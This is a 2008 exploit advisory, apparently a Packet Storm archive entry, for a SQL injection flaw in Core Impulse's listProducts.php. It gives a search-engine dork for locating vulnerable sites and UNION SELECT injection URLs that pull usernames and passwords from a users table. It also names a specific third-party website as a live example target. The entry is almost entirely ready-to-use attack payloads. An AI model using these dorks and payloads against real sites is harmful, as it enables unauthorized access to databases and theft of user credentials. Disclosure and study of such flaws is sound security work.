core-sql.txt

2008-04-28T00:00:00
ID PACKETSTORM:65870
Type packetstorm
Reporter e.wiZz!
Modified 2008-04-28T00:00:00

Description

                                        
                                            `Core Impulse SQL Injection vulnerability  
******************************  
Vendor site: www.coreimpulse.com   
discovered by: e.wiZz!  
Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat  
  
Exploit:  
  
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/  
  
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/  
  
Example:  
  
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/*http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/  
  
My blog: infected.blogger.ba  
  
visit: 50centshost.com/forum  
Info:bezveze ovo al et,osjecam se kao noob :D  
  
Thanks 2: big thanks to my friend aluigi(aluigi.freeforums.org),QKrunix,F34r...nekako su mi zanimljivi,hvala i skillpak3ru sto me nasmijava svojim znanjem :D  
`